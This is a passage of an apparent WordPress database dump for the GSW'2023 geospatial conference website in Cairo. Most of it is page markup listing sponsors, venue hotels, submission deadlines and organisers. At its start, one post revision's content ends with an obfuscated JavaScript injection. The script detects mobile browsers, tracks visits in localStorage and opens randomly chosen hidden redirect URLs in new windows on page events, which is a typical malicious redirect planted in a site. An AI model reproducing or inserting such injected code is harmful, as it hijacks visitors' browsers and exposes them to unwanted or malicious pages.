|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-03 11:26:56','2023-06-03 11:26:56','',3066,'https://gsw2023.com/?p=4624',0,'revision','',0),
(4625,1,'2023-06-03 11:27:40','2023-06-03 11:27:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and 